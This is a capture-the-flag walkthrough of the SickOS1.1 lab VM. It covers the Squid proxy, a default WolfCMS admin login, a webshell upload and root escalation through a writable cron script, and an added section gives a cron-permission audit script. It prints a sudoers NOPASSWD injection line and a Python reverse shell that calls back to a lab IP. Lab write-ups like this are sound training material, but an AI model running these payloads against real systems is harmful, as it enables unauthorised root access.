SickOS1.1

  1. Nmap scan -> 22 (ssh), 3128 (http-proxy Squid), 8080 (closed http-proxy)
  2. Started ncrack on the ssh port
  3. Ran nikto on the http proxy
     nikto -h 192.168.1.210 -useproxy http://192.168.1.210:3128
  4. Configured my browser to connect through the proxy.
  5. Went to view the webpage and this is what I see…

[screenshot: Bleehhh.jpg]

  1. In the nikto scan I saw the words robots.txt, no idea what it meant but I typed it in anyway
    • Disallow: /wolfcms/
  2. Navigated to that directory and found a blog type thing.
  3. Started researching some wolfcms stuff and found a list of “default directories”
  4. An ?admin page was one of them. Found a login page.
  5. The blog is still very new

[screenshot: Blog.png]

  1. Because it’s new I google around for the default user and pass of the login page.
    • Looks like it is admin/admin
      1. Shoulda probably tried that myself…
  2. Land on a weird looking page.

[screenshot: admin page.png]

  1. After navigating a little bit I find a file upload function.
    • Have never done any file upload stuff so I started researching really quick.
    • My first thoughts are a webshell
  2. Apparently a webshell is exactly what I was supposed to do.
    • (thankfully)
  3. After navigating to my trusty webshell page I now have a shell as the www-data user

[screenshot: Shell.png]

  1. Now for some priv escalation.
  2. Check crontab -l
    • Doesn’t show anything…
  3. Apparently there are a bunch of places to check for cronjobs
    • /var/spool/cron/*
    • /etc/crontab
    • /etc/cron.d/*
    • /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly
  4. Cron.d shows me that connect.py is run as root! So now what….
  5. So I know that connect.py is run and… I can echo stuff to it…
  6. So if I just put the right stuff in there I should get a shell I think…
  7. Tried pasting this in and waited but got some weird error whenever I tried to sudo.
    • I think this didn’t work because the cronjob runs it with python
      1. Derp…
echo "www-data ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers > shell.sh
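The condition that made this privesc possible is a root cron job whose script other users can write to. The audit script below is an added example and is not from the original writeup; it parses system-crontab-format files the way cron does and flags every root job whose command names a group- or world-writable file. The cron.d directory it builds under mktemp and the connect_demo.py file inside it are constructed stand-ins for /etc/cron.d and connect.py, so it can be run offline; point audit_cron_dir at a real directory to use it on a box.

```shell
#!/bin/sh
# Added audit script, not part of the original writeup: find root cron jobs
# whose command references a file that non-root users can modify, which is the
# weakness the writeup exploits through connect.py. POSIX sh plus grep/find/ls.

# audit_cron_dir DIR
# Parses every system-crontab-format file in DIR (e.g. /etc/cron.d) and prints
# "WRITABLE <cronfile> <path> <mode>" for each absolute path in a root job's
# command that is a regular file writable by group or others.
audit_cron_dir() {
    dir="$1"
    for cronfile in "$dir"/*; do
        set -f                       # cron fields contain literal '*': no globbing
        [ -f "$cronfile" ] || continue
        # Drop comments and blank lines. What remains is either
        # "m h dom mon dow user command" or "@period user command";
        # anything else (SHELL=, PATH=, ...) is an environment assignment.
        grep -Ev '^[[:space:]]*(#|$)' "$cronfile" |
        while read -r f1 f2 f3 f4 f5 f6 rest; do
            case "$f1" in
                @*)      user=$f2; cmd="$f3 $f4 $f5 $f6 $rest" ;;
                [0-9*]*) user=$f6; cmd=$rest ;;
                *)       continue ;;
            esac
            [ "$user" = "root" ] || continue
            # Every absolute path in the command is a candidate: the
            # interpreter as well as the script it is given.
            for tok in $cmd; do
                case "$tok" in /*) ;; *) continue ;; esac
                [ -f "$tok" ] || continue
                # -perm -020: group-writable; -perm -002: world-writable
                if [ -n "$(find "$tok" -prune \( -perm -020 -o -perm -002 \) 2>/dev/null)" ]; then
                    mode=$(ls -ld "$tok" | cut -d' ' -f1)
                    echo "WRITABLE $cronfile $tok $mode"
                fi
            done
        done
    done
    set +f
}

# make_sample_cron
# Builds a constructed sample tree under mktemp and prints its path:
#   cron.d/automate  root job running a world-writable stand-in for connect.py (flagged)
#   cron.d/backup    root job running a 0755 script only root can write (clean)
#   cron.d/www       the same writable script, but run as www-data, not root (clean)
make_sample_cron() {
    base=$(mktemp -d)
    mkdir -p "$base/cron.d" "$base/scripts"
    printf '#!/bin/sh\necho connect\n' > "$base/scripts/connect_demo.py"   # constructed
    chmod 0777 "$base/scripts/connect_demo.py"
    printf '#!/bin/sh\necho backup\n' > "$base/scripts/backup.sh"          # constructed
    chmod 0755 "$base/scripts/backup.sh"
    printf 'SHELL=/bin/sh\n* * * * * root python %s\n' "$base/scripts/connect_demo.py" > "$base/cron.d/automate"
    printf '@daily root %s\n' "$base/scripts/backup.sh" > "$base/cron.d/backup"
    printf '*/5 * * * * www-data %s\n' "$base/scripts/connect_demo.py" > "$base/cron.d/www"
    echo "$base"
}

# Usage: sh audit_cron.sh [DIR]   (no DIR = run against the constructed sample)
if [ -n "${1:-}" ]; then
    audit_cron_dir "$1"
else
    sample=$(make_sample_cron)
    audit_cron_dir "$sample/cron.d"
    rm -rf "$sample"
fi
```

Only the automate entry is reported: backup.sh is not writable by anyone but its owner, and the www entry runs the writable script without root, so a write to it gains nothing. The same check is worth running against /etc/crontab and the per-user spool as well, since the page lists those as places cron reads from.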
  1. Started googling other things I could throw in there to make it work.
    • Found a python reverse shell script I want to try.
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.1.185',36807));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);
  1. After a ton of tweaking, I finally got the above string to echo into connect.py.
    • Ran python connect.py to see if it would give me a user shell (it did)
    • Now I just had to wait.
  2. About 30 seconds later, I got my shell.

[screenshot: Completed.jpg]
